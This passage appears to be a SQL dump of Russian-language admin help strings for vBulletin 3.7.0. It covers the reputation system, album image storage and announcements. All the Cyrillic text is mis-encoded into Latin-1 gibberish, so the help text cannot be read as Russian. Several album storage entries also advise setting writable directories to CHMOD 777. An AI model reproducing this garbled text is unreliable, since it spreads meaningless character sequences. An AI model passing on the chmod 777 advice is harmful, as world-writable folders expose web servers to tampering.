(21819, -1, 'adminreputation_text', 'cphelptext', 'Ãåïóòà öèÿ ïîëüçîâà òåëåé: \r\nÑèñòåìà ðåïóòà öèè ïðåäñòà âëÿåò ñîáîé ñèñòåìó ðåéòèÃãà ïîëüçîâà òåëåé, îñÃîâà ÃÃóþ Ãà îöåÃêå âûñêà çûâà Ãèé ýòèõ ïîëüçîâà òåëåé â ñâîèõ ñîîáùåÃèÿõ. Ãîëüçîâà òåëè ìîãóò äîáà âëÿòü è îòáèðà òü î÷êè ðåïóòà öèè äðóãèì ïîëüçîâà òåëÿì, îöåÃèâà ÿ èõ ñîîáùåÃèÿ. Âû ìîæåòå óñòà Ãîâèòü îãðà Ãè÷åÃèÿ Ãà êîëè÷åñòâî òà êèõ îöåÃîê â ÎñÃîâÃûõ Ãà ñòðîéêà õ . \r\nÓðîâåÃü ðåïóòà öèè ïîçâîëÿåò âèäåòü îòÃîøåÃèå ñîîáùåñòâà ê êà æäîìó êîÃêðåòÃîìó ïîëüçîâà òåëþ. Ãòîò âèä îáðà òÃîé ñâÿçè ïîîùðÿåò ïîëüçîâà òåëåé Ãà Ãà ïèñà Ãèå áîëåå îáäóìà ÃÃûõ è âçâåøåÃÃûõ ñîîáùåÃèé. \r\nÂû ìîæåòå äà âà òü Ãà çâà Ãèÿ óðîâÃÿì ðåïóòà öèè ïîëüçîâà òåëåé Ãà ñòðà Ãèöå Óïðà âëåÃèå óðîâÃÿìè ðåïóòà öèè . ÓðîâÃè ðåïóòà öèè ïîëüçîâà òåëåé Ãåñêîëüêî ïîõîæè Ãà ñòà òóñû ïîëüçîâà òåëåé è èõ çâà Ãèÿ, èõ òà êæå ìîæÃî óâèäåòü ðÿäîì ñ èìåÃåì ïîëüçîâà òåëÿ. \r\nÂû ìîæåòå ñîçäà òü ñèñòåìó ïîâûøåÃèé . ÃîâûøåÃèÿ èñïîëüçóþòñÿ äëÿ èçìåÃÃ¥Ãèÿ ïðèÃà äëåæÃîñòè ïîëüçîâà òåëÿ ê ãðóïïå ïðè îïðåäåëåÃÃûõ îáñòîÿòåëüñòâà õ, îäÃî èç êîòîðûõ - óðîâåÃü ðåïóòà öèè. Òà ê êà ê áîëüøèÃñòâî ïðà â è ðà çðåøåÃèé ôîðóìà óïðà âëÿåòñÿ Ãà óðîâÃÃ¥ ãðóïï ïîëüçîâà òåëåé, ðåïóòà öèÿ ïîëüçîâà òåëÿ âìåñòå ñ ñèñòåìîé ÃîâûøåÃèé ìîæåò áûòü èñïîëüçîâà Ãà äëÿ îñóùåñòâëåÃèÿ Ãåêîåãî \"Êà ðüåðÃîãî ðîñòà \" :). Òà êèì îáðà çîì, èñïîëüçóÿ ñèñòåìû ðåïóòà öèè, ïîâûøåÃèé è ãðóïïîâûõ ïðà â, âû ìîæåòå â à âòîìà òè÷åñêîì ðåæèìå ïîîùðÿòü èëè Ãà êà çûâà òü \"õîðîøèõ\" è \"ïëîõèõ\" ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(21820, -1, 'adminreputation_title', 'cphelptext', 'Î ðåïóòà öèè ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(21821, -1, 'adminreputation_add_text', 'cphelptext', 'Ãîçâîëÿåò äîáà âèòü Ãîâûé óðîâåÃü ðåïóòà öèè.', 'vbulletin', '', 0, ''),
(21822, -1, 'adminreputation_add_title', 'cphelptext', 'Äîáà âëåÃèå óðîâÃÿ ðåïóòà öèè', 'vbulletin', '', 0, ''),
(21823, -1, 'adminreputation_add_edit_level_text', 'cphelptext', 'ÈìåÃÃî ýòà ñòðîêà áóäåò îòîáðà æà òüñÿ, êà ê óðîâåÃü ðåïóòà öèè ïîëüçîâà òåëÿ, êîãäà îà Ãà áåðåò êîëè÷åñòâî î÷êîâ ðåïóòà öèè, ðà âÃîå èëè áîëüøåå çÃà ÷åÃèþ, óêà çà ÃÃîìó â ñëåäóþùåé îïöèè.', 'vbulletin', '', 0, ''),
(21824, -1, 'adminreputation_add_edit_level_title', 'cphelptext', 'Îïèñà Ãèå óðîâÃÿ', 'vbulletin', '', 0, ''),
(21825, -1, 'adminreputation_add_edit_minimumreputation_text', 'cphelptext', 'Ãòî ìîæåò áûòü êà ê ïîëîæèòåëüÃîå, òà ê è îòðèöà òåëüÃîå ÷èñëî. Êîãäà ðåïóòà öèÿ ïîëüçîâà òåëÿ äîñòèãà åò ýòîãî ÷èñëà , ïîëüçîâà òåëþ áóäåò ïðèñâîåà äà ÃÃûé óðîâåÃü ðåïóòà öèè.', 'vbulletin', '', 0, ''),
(21826, -1, 'adminreputation_add_edit_minimumreputation_title', 'cphelptext', 'ÌèÃèìà ëüÃîå êîëè÷åñòâî î÷êîâ ðåïóòà öèè, Ãåîáõîäèìîå äëÿ äà ÃÃîãî óðîâÃÿ', 'vbulletin', '', 0, ''),
(21827, -1, 'adminreputation_deletereputation_text', 'cphelptext', 'Ãòî ñòðà Ãèöà ïîäòâåðæäåÃèÿ óäà ëåÃèÿ ïðèñâîåÃÃîé ðåïóòà öèè. Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ óäà ëåÃèÿ. Äà ÃÃîå äåéñòâèå Ãåëüçÿ áóäåò îòìåÃèòü.', 'vbulletin', '', 0, ''),
(21828, -1, 'adminreputation_deletereputation_title', 'cphelptext', 'Óäà ëåÃèå ïðèñâîåÃÃîé ðåïóòà öèè', 'vbulletin', '', 0, ''),
(21829, -1, 'adminreputation_dolist_text', 'cphelptext', 'Ãòî ñïèñîê ïðèñâîåÃÃîé ðåïóòà öèè, ñîîòâåòñòâóþùåé âà øèì ïà ðà ìåòðà ì çà ïðîñà . Âû ìîæåòå îòðåäà êòèðîâà òü èëè óäà ëèòü ðåïóòà öèþ, Ãà æà â Ãà ññûëêè, ñïðà âà îò Ãå¸.', 'vbulletin', '', 0, ''),
(21830, -1, 'adminreputation_dolist_title', 'cphelptext', 'Ãðîñìîòð êîììåÃòà ðèåâ ê ðåïóòà öèè', 'vbulletin', '', 0, ''),
(21831, -1, 'adminreputation_edit_text', 'cphelptext', 'Çäåñü âû ìîæåòå îòðåäà êòèðîâà òü ñóùåñòâóþùèé óðîâåÃü ðåïóòà öèè.', 'vbulletin', '', 0, ''),
(21832, -1, 'adminreputation_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå óðîâÃÿ ðåïóòà öèè', 'vbulletin', '', 0, ''),
(21833, -1, 'adminreputation_editreputation_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì îòðåäà êòèðîâà òü ïðèñâîåÃÃóþ ðåïóòà öèþ. Ãîñëå ðåäà êòèðîâà Ãèÿ ñòîèò ïåðåñòðîèòü ðåïóòà öèþ ïîëüçîâà òåëåé .', 'vbulletin', 'zCarot', 1205940267, '3.7.0 Release Candidate 1'),
(21834, -1, 'adminreputation_editreputation_title', 'cphelptext', 'Ãåäà êòèðîâà òü ðåïóòà öèþ', 'vbulletin', '', 0, ''),
(21835, -1, 'adminreputation_editreputation_reason_text', 'cphelptext', 'Ãòî ïðè÷èÃà , ïî êîòîðîé áûëà ïðèñâîåÃà ýòà ðåïóòà öèÿ. Ãîëüçîâà òåëè ìîãóò ïðîñìà òðèâà òü ýòó ïðè÷èÃó â çà âèñèìîñòè îò ïðà â äîñòóïà .', 'vbulletin', '', 0, ''),
(21836, -1, 'adminreputation_editreputation_reason_title', 'cphelptext', 'ÊîììåÃòà ðèé', 'vbulletin', '', 0, ''),
(21837, -1, 'adminreputation_editreputation_reputation_text', 'cphelptext', 'Ãòî êîëè÷åñòâî î÷êîâ ðåïóòà öèè, ïîëó÷åÃÃûõ çà îäÃî ïðèñâîåÃèå. ÇÃà ÷åÃèå ìîæåò áûòü ïîëîæèòåëüÃûì èëè îòðèöà òåëüÃûì.', 'vbulletin', '', 0, ''),
(21838, -1, 'adminreputation_editreputation_reputation_title', 'cphelptext', 'Ãåïóòà öèÿ', 'vbulletin', '', 0, ''),
(21839, -1, 'adminreputation_list_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì Ãà éòè ðåïóòà öèè îñòà âëåÃÃûå/ïîëó÷åÃÃûå îïðåäåëåÃÃûì ïîëüçîâà òåëåì â òå÷åÃèè îïðåäåëåÃÃîé äà òû.', 'vbulletin', '', 0, ''),
(21840, -1, 'adminreputation_list_title', 'cphelptext', 'Ãðîñìîòð êîììåÃòà ðèåâ ê ðåïóòà öèè', 'vbulletin', '', 0, ''),
(21841, -1, 'adminreputation_list_dolist_leftfor_text', 'cphelptext', 'Äëÿ âûáîðêè êîììåÃòà ðèåâ, îñòà âëåÃÃûõ äëÿ îïðåäåëåÃÃîãî ïîëüçîâà òåëÿ, ââåäèòå ñþäà åãî èìÿ. Ãðîïóñòèòå ýòî ïîëå, ÷òîáû âûáðà òü êîììåÃòà ðèè, îñòà âëåÃÃûå äëÿ âñåõ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(21842, -1, 'adminreputation_list_dolist_leftfor_title', 'cphelptext', 'ÊîììåÃòà ðèè ê ðåïóòà öèè îñòà âëåÃû äëÿ', 'vbulletin', '', 0, ''),
(21843, -1, 'adminreputation_list_dolist_leftby_text', 'cphelptext', 'Äëÿ âûáîðêè êîììåÃòà ðèåâ, îñòà âëåÃÃûõ îïðåäåëåÃÃûì ïîëüçîâà òåëåì, ââåäèòå ñþäà åãî èìÿ. Ãðîïóñòèòå ýòî ïîëå, ÷òîáû âûáðà òü êîììåÃòà ðèè, îñòà âëåÃÃûå âñåìè ïîëüçîâà òåëÿìè.', 'vbulletin', '', 0, ''),
(21844, -1, 'adminreputation_list_dolist_leftby_title', 'cphelptext', 'ÊîììåÃòà ðèè ê ðåïóòà öèè îñòà âëåÃû êåì', 'vbulletin', '', 0, ''),
(21845, -1, 'adminreputation_list_dolist_start_text', 'cphelptext', 'Âûáåðèòå äà òó Ãà ÷à ëà äëÿ ýòîé âûáîðêè. Óêà æèòå ìåñÿö, äåÃü è ãîä. Âûáðà ÃÃà ÿ ñòà òèñòèêà äîëæÃà áûòü ÃÃ¥ ñòà ðøå ýòîé äà òû.', 'vbulletin', '', 0, ''),
(21846, -1, 'adminreputation_list_dolist_start_title', 'cphelptext', 'Ãà ÷à ëüÃà ÿ äà òà ', 'vbulletin', '', 0, ''),
(21847, -1, 'adminreputation_list_dolist_end_text', 'cphelptext', 'Âûáåðèòå äà òó îêîÃֈ Ãèÿ äëÿ ýòîé âûáîðêè. Óêà æèòå ìåñÿö, äåÃü è ãîä. Âûáðà ÃÃà ÿ ñòà òèñòèêà äîëæÃà áûòü ÃÃ¥ Ãîâåå ýòîé äà òû. Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ âìåñòå ñ îïöèåé \"Äà òà Ãà ÷à ëà \", ÷òîáû ñîçäà òü âðåìåÃÃîé ïðîìåæóòîê.', 'vbulletin', '', 0, ''),
(21848, -1, 'adminreputation_list_dolist_end_title', 'cphelptext', 'ÊîÃå÷Ãà ÿ äà òà ', 'vbulletin', '', 0, ''),
(21849, -1, 'adminreputation_modify_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå ìîæÃî èçìåÃÿòü ìèÃèìà ëüÃîå êîëè÷åñòâî î÷êîâ, Ãåîáõîäèìûõ äëÿ êà æäîãî èç óðîâÃåé ðåïóòà öèè. Äëÿ âñòóïëåÃèÿ èçìåÃÃ¥Ãèé â ñèëó, ÃÃ¥ çà áóäüòå Ãà æà òü êÃîïêó \"ÎáÃîâèòü\". Âû ÃÃ¥ ìîæåòå óñòà Ãà âëèâà òü îäèà è òîò æå ìèÃèìóì î÷êîâ äëÿ áîëåå ÷åì îäÃîãî óðîâÃÿ ðåïóòà öèè. \r\nÒà êæå îòñþäà âû ìîæåòå óäà ëèòü èëè ïåðåéòè ê ðåäà êòèðîâà Ãèþ ëþáîãî èç óðîâÃåé. Ãà æìèòå Ãà ññûëêó \"Ãðà âèòü\" èëè \"Óäà ëèòü\" äëÿ ñîîòâåòñòâåÃÃî ðåäà êòèðîâà Ãèÿ èëè óäà ëåÃèÿ êîÃêðåòÃîãî óðîâÃÿ ðåïóòà öèè. (Ñì. Ãåäà êòèðîâà Ãèå óðîâÃåé ðåïóòà öèè ). Ãðè óäà ëåÃèè óðîâÃÿ ðåïóòà öèè èëè èçìåÃÃ¥Ãèè ìèÃèìóìà î÷êîâ äëÿ äà ÃÃîãî óðîâÃÿ, ðåïóòà öèè âñåõ ïîëüçîâà òåëåé áóäóò ïåðåñ÷èòà Ãû äëÿ ñîîòâåòñòâèÿ Ãîâûì óðîâÃÿì.', 'vbulletin', 'zCarot', 1205430963, '3.7.0 Release Candidate 1'),
(21850, -1, 'adminreputation_modify_title', 'cphelptext', 'Óïðà âëåÃèå óðîâÃÿìè ðåïóòà öèè ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(21851, -1, 'adminreputation_remove_text', 'cphelptext', 'Ãòî ñòðà Ãèöà ïîäòâåðæäåÃèÿ óäà ëåÃèÿ ýòîãî óðîâÃÿ ðåïóòà öèè. Ãà æìèòå êÃîïêó \"Äà \" äëÿ ïîäòâåðæäåÃèÿ óäà ëåÃèÿ.', 'vbulletin', '', 0, ''),
(21852, -1, 'adminreputation_remove_title', 'cphelptext', 'Óäà ëåÃèå óðîâÃÿ ðåïóòà öèè', 'vbulletin', '', 0, ''),
(21853, -1, 'album_storage_text', 'cphelptext', 'Äà ÃÃà ÿ ñòðà Ãèöà ïîçâîëÿåò âà ì ïåðåìåñòèòü âà øè èçîáðà æåÃèÿ èç áà çû äà ÃÃûõ â ôà éëîâóþ ñèñòåìó, ëèáî, åñëè îÃè óæå â ôà éëîâîé ñèñòåìå, â äðóãóþ äèðåêòîðèþ ôà éëîâîé ñèñòåìû èëè Ãà çà ä â áà çó äà ÃÃûõ. ÃîìÃèòå, ÷òî åñëè ó âà ñ áóäåò Ãåäîñòà òî÷Ãî ñâîáîäÃîãî ìåñòà , òî ïðîöåññ ÃÃ¥ áóäåò âûïîëÃÃ¥Ã, Ãî ïðè ýòîì âñå èçîáðà æåÃèÿ áóäóò â ñîõðà ÃÃîñòè, òà ê êà ê ïðîâåðêè Ãà Ãà ëè÷èå ñâîáîäÃîãî ìåñòà èäóò â ïåðâóþ î÷åðåäü. \r\n \r\nÈçîáðà æåÃèÿ ÃÃ¥ áóäóò óäà ëåÃû èç áà çû äà ÃÃûõ èëè ôà éëîâîé ñèñòåìû, è ìåñòî õðà ÃÃ¥Ãèÿ ÃÃ¥ áóäåò èçìåÃÃ¥Ãî äî îêîÃֈ Ãèÿ ïðîöåññà .\r\nÅñëè ïðîöåññ ïðåðâ¸òñÿ, òî âà ì ïîòðåáóåòñÿ îñâîáîäèòü ìåñòî èëè óäà ëèòü Ãåêîòîðûå èçîáðà æåÃèÿ, ïðåæäå ÷åì ïîïðîáîâà òü ñÃîâà . \r\n \r\nÅñëè âû ïåðåìåùà åòå èçîáðà æåÃèÿ èç ôà éëîâîé ñèñòåìû â áà çó äà ÃÃûõ, òî äîëæÃî áûòü äîñòà òî÷Ãî ñâîáîäÃîãî ìåñòà Ãà äèñêå èëè ðà çäåëå, ãäå õðà Ãèòñÿ áà çà äà ÃÃûõ. \r\n \r\nÑóùåñòâóþò äâà ñïîñîáà õðà ÃÃ¥Ãèÿ â ôà éëîâîé ñèñòåìå:\r\n\r\nÑ ïðÿìûì äîñòóïîì ê ìèÃèà òþðà ì - ýòîò ñïîñîá óñêîðÿåò çà ãðóçêó ñòðà Ãèö à ëüáîìà , òà ê êà ê äëÿ îòîáðà æåÃèÿ ìèÃèà òþð ÃÃ¥ òðåáóåòñÿ îáðà ùåÃèå ê áà çå äà ÃÃûõ. ÎäÃà êî, åñëè ïîëüçîâà òåëü çÃà åò ññûëêó Ãà ìèÃèà òþðó, òî îà ñìîæåò îáîéòè îãðà Ãè÷åÃèÿ Ãà ïðîñìîòð, ÷òîáû óâèäåòü ìèÃèà òþðó. ÎðèãèÃà ëû èçîáðà æåÃèé âñåãäà îòîáðà æà þòñÿ òîëüêî ÷åðåç ôîðóì, ÷òîáû ïðîâåðèòü ïðà âà Ãà ïðîñìîòð. \r\nÃåç ïðÿìîãî äîñòóïà ê ìèÃèà òþðà ì - ýòîò ñïîñîá õðà Ãèò äâîè÷Ãûå äà ÃÃûå çà ïðåäåëà ìè áà çû äà ÃÃûõ, Ãî ïóòü ê ìèÃèà òþðå õðà Ãèòñÿ â áà çå äà ÃÃûõ, ÷òî çà ñòà âëÿåò èñïîëüçîâà òü äîïîëÃèòåëüÃûé çà ïðîñ ê áà çå. ÎäÃà êî, ïðà âà Ãà ïðîñìîòð îðèãèÃà ëîâ èçîáðà æåÃèé áóäóò ðà áîòà òü è Ãà èõ ìèÃèà òþðû. \r\n \r\nÅñëè èçîáðà æåÃèÿ õðà Ãÿòñÿ â áà çå äà ÃÃûõ, òî ïðà âà Ãà ïðîñìîòð ó÷èòûâà þòñÿ âñåãäà . \r\n \r\nÅñëè âû ïåðåìåùà åòå èçîáðà æåÃèÿ â ôà éëîâóþ ñèñòåìó, òî âà ì ñëåäóåò ñîçäà òü äèðåêòîðèþ (èëè äèðåêòîðèè), â êîòîðûå ñìîæåò çà ïèñûâà òü PHP. Ñà ìûé ïðîñòîé ñïîñîá ñäåëà òü ýòî: óñòà Ãîâèòü CHMOD 777 (èçó÷èòå äîêóìåÃòà öèþ ïî âà øåìó FTP, Telnet, èëè SSH, ÷òîáû óçÃà òü êà ê ýòî ñäåëà òü). Ãîëåå ïîäðîáÃà ÿ èÃôîðìà öèÿ, ãäå ñëåäóåò ñîçäà âà òü ýòó äèðåêòîðèþ, Ãà õîäèòñÿ Ãà ñëåäóþùèõ ñòðà Ãèöà õ.', 'vbulletin', 'zCarot', 1205940321, '3.7.0 Release Candidate 1'),
(21854, -1, 'album_storage_title', 'cphelptext', 'Ìåñòî õðà ÃÃ¥Ãèÿ èçîáðà æåÃèé', 'vbulletin', 'zCarot', 1193055819, '3.7.0 Beta 1'),
(21855, -1, 'album_switchtype_album_picpath_text', 'cphelptext', 'Ãî ýòîìó ïóòè áóäóò õðà Ãèòüñÿ îðèãèÃà ëû èçîáðà æåÃèé, åñëè âû âûáðà ëè ïðÿìîé äîñòóï ê ìèÃèà òþðà ì, ëèáî çäåñü áóäóò õðà Ãèòñÿ èçîáðà æåÃèÿ è ìèÃèà òþðû ê Ãèì, åñëè âû âûáðà ëè âòîðîé âà ðèà Ãò. \r\n \r\nÃòà äèðåêòîðèÿ äîëæÃà Ãà õîäèòüñÿ âÃÃ¥ âà øåé ïóáëè÷Ãîé äèðåêòîðèè äëÿ ñåòè (îáû÷Ãî äèðåêòîðèÿ Ãà çûâà åòñÿ public_html èëè www). Åñëè æå âû ïîìåñòèòå âÃóòðè ïóáëè÷Ãîé äèðåêòîðèè, òî ëþäè ñìîãóò îáîéòè îãðà Ãè÷åÃèÿ è ñêà ÷à òü ëþáûå çà ãðóæåÃÃûå èçîáðà æåÃèÿ. \r\n \r\nÃòà äèðåêòîðèÿ äîëæÃà èìåòü ïðà âà , äà þùèå âîçìîæÃîñòü çà ïèñè â Ãå¸ ñ ïîìîùüþ PHP. Ñà ìûé ïðîñòîé ñïîñîá ñäåëà òü ýòî: óñòà Ãîâèòü CHMOD 777 (èçó÷èòå äîêóìåÃòà öèþ ïî âà øåìó FTP, Telnet, èëè SSH, ÷òîáû óçÃà òü êà ê ýòî ñäåëà òü).', 'vbulletin', 'zCarot', 1193056118, '3.7.0 Beta 1'),
(21856, -1, 'album_switchtype_album_picpath_title', 'cphelptext', 'ÃîëÃûé ïóòü ê ôà éëà ì èçîáðà æåÃèé / Ãóòü ê ôà éëà ì èçîáðà æåÃèé è ìèÃèà òþð', 'vbulletin', 'zCarot', 1193056141, '3.7.0 Beta 1'),
(21857, -1, 'album_switchtype_album_thumbpath_text', 'cphelptext', 'Ãòî ïóòü, ïî êîòîðîìó áóäóò õðà Ãèòüñÿ ìèÃèà òþðû.  ïðîòèâîïîëîæÃîñòü ïà ðà ìåòðó \"ÃîëÃûé ïóòü ê ôà éëà ì èçîáðà æåÃèé\", äà ÃÃûé ïóòü äîëæåà áûòü âÃóòðè âà øåé ïóáëè÷Ãîé äèðåêòîðèè äëÿ ñåòè, èÃà ÷å ïîëüçîâà òåëè ÃÃ¥ ñìîãóò óâèäåòü ìèÃèà òþðû. \r\n \r\nÃòà äèðåêòîðèÿ äîëæÃà èìåòü ïðà âà , äà þùèå âîçìîæÃîñòü çà ïèñè â Ãå¸ ñ ïîìîùüþ PHP. Ñà ìûé ïðîñòîé ñïîñîá ñäåëà òü ýòî: óñòà Ãîâèòü CHMOD 777 (èçó÷èòå äîêóìåÃòà öèþ ïî âà øåìó FTP, Telnet, èëè SSH, ÷òîáû óçÃà òü êà ê ýòî ñäåëà òü).', 'vbulletin', 'zCarot', 1193056102, '3.7.0 Beta 1'),
(21858, -1, 'album_switchtype_album_thumbpath_title', 'cphelptext', 'Ãóòü ê ìèÃèà òþðà ì', 'vbulletin', 'zCarot', 1193056102, '3.7.0 Beta 1'),
(21859, -1, 'album_switchtype_album_thumburl_text', 'cphelptext', 'Ãòî ññûëêà Ãà \"Ãóòü ê ìèÃèà òþðà ì\", êîòîðûé âû ââåëè. ÃŽÃà äîëæÃà áûòü óêà çà Ãà îòÃîñèòåëüÃî êîðÃåâîé äèðåêòîðèè âà øåãî ôîðóìà .', 'vbulletin', 'zCarot', 1193056219, '3.7.0 Beta 1'),
(21860, -1, 'album_switchtype_album_thumburl_title', 'cphelptext', 'Ññûëêà Ãà ìèÃèà òþðû', 'vbulletin', 'zCarot', 1193056219, '3.7.0 Beta 1'),
(21861, -1, 'album_thumb_perpage_text', 'cphelptext', 'Óêà æèòå çäåñü êîëè÷åñòâî èçîáðà æåÃèé â îäÃîì öèêëå, ê êîòîðûì ñëåäóåò ñîçäà âà òü ìèÃèà òþðû. Åñëè âû óêà æèòå çäåñü ñëèøêîì áîëüøîå çÃà ÷åÃèå, òî ìîæåòå ïîëó÷èòü ïðåðûâà Ãèå ðà áîòû ïî òà éìà óòó. Åñëè óêà æèòå ñëèøêîì ìà ëåÃüêîå çÃà ÷åÃèå, òî ïðîöåññ çà òÿÃåòñÿ ïî âðåìåÃè.', 'vbulletin', 'zCarot', 1193055118, '3.7.0 Beta 1'),
(21862, -1, 'album_thumb_perpage_title', 'cphelptext', 'Êîëè÷åñòâî èçîáðà æåÃèé, îáðà áà òûâà åìûõ çà îäèà öèêë', 'vbulletin', 'zCarot', 1193055118, '3.7.0 Beta 1'),
(21863, -1, 'album_thumb_quality_text', 'cphelptext', 'Êà ÷åñòâî JPEG ìèÃèà òþð. Ãî óìîë÷à Ãèþ çäåñü áóäåò èñïîëüçîâà òüñÿ çÃà ÷åÃèå, óêà çà ÃÃîå â ãëîáà ëüÃûõ Ãà ñòðîéêà õ. Åñëè âû óêà æèòå çäåñü äðóãîå çÃà ÷åÃèå, òî ïîìÃèòå, ÷òî âñå èçîáðà æåÃèÿ, çà ãðóæåÃÃûå ïîñëå ýòîãî ïåðåñòðîåÃèÿ, áóäóò èñïîëüçîâà òü ãëîáà ëüÃîå çÃà ÷åÃèå êà ÷åñòâà ! \r\n \r\nÂâåäèòå ÷èñëî îò 0 äî 100. 0 - ñà ìîå Ãèçêîå êà ÷åñòâî, Ãî ñà ìûé ìà ëåÃüêèé ðà çìåð. 100 - ñà ìûé áîëüøîé ðà çìåð è ëó÷øåå êà ÷åñòâî. Èäåà ëüÃîå çÃà ÷åÃèå Ãà õîäèòñÿ ìåæäó 75 è 85.', 'vbulletin', 'zCarot', 1193055289, '3.7.0 Beta 1'),
(21864, -1, 'album_thumb_quality_title', 'cphelptext', 'Êà ÷åñòâî ìèÃèà òþð', 'vbulletin', 'zCarot', 1193055289, '3.7.0 Beta 1'),
(21865, -1, 'announcement_text', 'cphelptext', 'ÎáúÿâëåÃèÿ: \r\nÑèñòåìà îáúÿâëåÃèé ôîðóìà ïîçâîëÿåò âà ì ñîîáùà òü âà æÃóþ èÃôîðìà öèþ âà øèì ïîëüçîâà òåëÿì. ÊîÃå÷Ãî, åñòü äðóãèå ñïîñîáû ÷òîáû ñäåëà òü ýòî (Ãà ïðèìåð, ïðèêðåïèòü òåìó), Ãî îáúÿâëåÃèÿ èìåþò ðÿä ïðåèìóùåñòâ: âû ìîæåòå èñïîëüçîâà òü HTML áåç âêëþ÷åÃèÿ îÃîãî Ãà ôîðóìå (÷òî î÷åÃü îïà ñÃî ), âû ìîæåòå ñïðÿòà òü îáúÿâëåÃèå äî Ãåêîòîðîãî âðåìåÃè è îÃî à âòîìà òè÷åñêè èñ÷åçÃåò ïîñëå äà òû îêîÃֈ Ãèÿ, òà êæå âû ìîæåòå äîáà âèòü îáúÿâëåÃèå ñðà çó êî âñåì ðà çäåëà ì. \r\n\r\nÅñëè ó âà ñ åñòü ìÃîæåñòâî îáúÿâëåÃèé, âêëþ÷à ÿ ãëîáà ëüÃûå, òî èõ ìîæÃî îòîáðà æà òü â îäÃîé òåìå, êîòîðà ÿ áóäåò äîñòóïÃà ïî Ãà æà òèþ Ãà Ãà çâà Ãèå ñà ìîãî Ãîâîãî îáúÿâëåÃèÿ â ñïèñêå ðà çäåëîâ. \r\n\r\nÎáúÿâëåÃèÿ Ãèêîãäà ÃÃ¥ óäà ëÿþòñÿ à âòîìà òè÷åñêè. Ãðè Ãà ñòóïëåÃèè äà òû îêîÃֈ Ãèÿ îáúÿâëåÃèå ïðîñòî ñêðîåòñÿ îò ïîëüçîâà òåëåé. ÃŽÃî ìîæåò â ëþáîé ìîìåÃò áûòü óäà ëåÃî èëè çà Ãîâî à êòèâèðîâà Ãî ÷åðåç ïà Ãåëü à äìèÃèñòðà òîðà . Äëÿ à êòèâà öèè îáúÿâëåÃèÿ, ïðîñòî ñìåÃèòå äà òó îêîÃֈ Ãèÿ Ãà Ãåêîòîðóþ äà òó èç áóäóùåãî. \r\n\r\n×òîáû äîáà âèòü îáúÿâëåÃèå, Ãà æìèòå Ãà \"Äîáà âèòü Ãîâîå îáúÿâëåÃèå\", Ãà õîäÿùååñÿ â ðà çäåëå ÎáúÿâëåÃèÿ â ëåâîé Ãà âèãà öèîÃÃîé ïà Ãåëè, èëè Ãà æà òèåì Ãà ññûëêó \"Ãîâîå\" ðÿäîì ñ Ãà çâà Ãèåì ðà çäåëà . (ñì Äîáà âëåÃèå îáúÿâëåÃèé ) \r\n\r\n×òîáû ïîñìîòðåòü ñïèñîê îáúÿâëåÃèé è ñïèñîê ðà çäåëîâ, ê êîòîðûì îÃè îòÃîñÿòñÿ, Ãà æìèòå Ãà Óïðà âëåÃèå îáúÿâëåÃèÿìè â ðà çäåëå ÎáúÿâëåÃèÿ â ëåâîé Ãà âèãà öèîÃÃîé ïà Ãåëè. Òà ì âû ñìîæåòå ñîçäà òü Ãîâîå ãëîáà ëüÃîå èëè ñïåöèôè÷åñêîå îáúÿâëåÃèå, à òà êæå èçìåÃÿòü èëè óäà ëÿòü óæå ñóùåñòâóþùèå. (ñì ÈçìåÃÃ¥Ãèå îáúÿâëåÃèé ) \r\n\r\nÃà æìèòå Ãåäà êòèðîâà òü äëÿ èçìåÃÃ¥Ãèÿ ïà ðà ìåòðîâ èëè òåêñòà îáúÿâëåÃèÿ, èëè Óäà ëèòü äëÿ óäà ëåÃèÿ. (ñì Ãåäà êòèðîâà Ãèå îáúÿâëåÃèé )', 'vbulletin', '', 0, ''),
(21866, -1, 'announcement_title', 'cphelptext', 'Îá îáúÿâëåÃèÿõ', 'vbulletin', '', 0, ''),
(21867, -1, 'announcement_add_text', 'cphelptext', 'Îïöèè Ãà ýòîé ñòðà Ãèöå îïèñûâà þòñÿ Ãèæå.', 'vbulletin', '', 0, ''),
(21868, -1, 'announcement_add_title', 'cphelptext', 'Äîáà âëåÃèå îáúÿâëåÃèé', 'vbulletin', '', 0, ''),
(21869, -1, 'announcement_add_signature_text', 'cphelptext', 'Åñëè \"Äà \", òî âà øà ïîäïèñü áóäåò îòîáðà æà òüñÿ â âà øåì îáúÿâëåÃèè.', 'vbulletin', 'zCarot', 1199283029, '3.7.0 Beta 4'),
(21870, -1, 'announcement_add_signature_title', 'cphelptext', 'Ãîêà çûâà òü ïîäïèñü', 'vbulletin', 'zCarot', 1199283029, '3.7.0 Beta 4'),
(21871, -1, 'announcement_add_edit_forumid_text', 'cphelptext', 'Óêà æèòå ðà çäåë ôîðóìà , â êîòîðîì äîëæÃî îòîáðà æà òüñÿ îáúÿâëåÃèå. Âûáåðèòå \"Âñå ðà çäåëû\", ÷òîáû ñäåëà òü îáúÿâëåÃèå ãëîáà ëüÃûì. Åñëè ó âûáðà ÃÃîãî ðà çäåëà åñòü ïîäðà çäåëû, òî îáúÿâëåÃèå áóäåò òà êæå ïîêà çûâà òüñÿ âî âñåõ ïîäðà çäåëà õ.', 'vbulletin', '', 0, ''),
(21872, -1, 'announcement_add_edit_forumid_title', 'cphelptext', 'Ãà çäåë', 'vbulletin', '', 0, ''),
(21873, -1, 'announcement_add_edit_title_text', 'cphelptext', 'Äà ÃÃûé òåêñò áóäåò îòîáðà æà òüñÿ â ðà çäåëà õ ôîðóìà â âèäå çà ãîëîâêà îáúÿâëåÃèÿ.', 'vbulletin', '', 0, ''),
(21874, -1, 'announcement_add_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
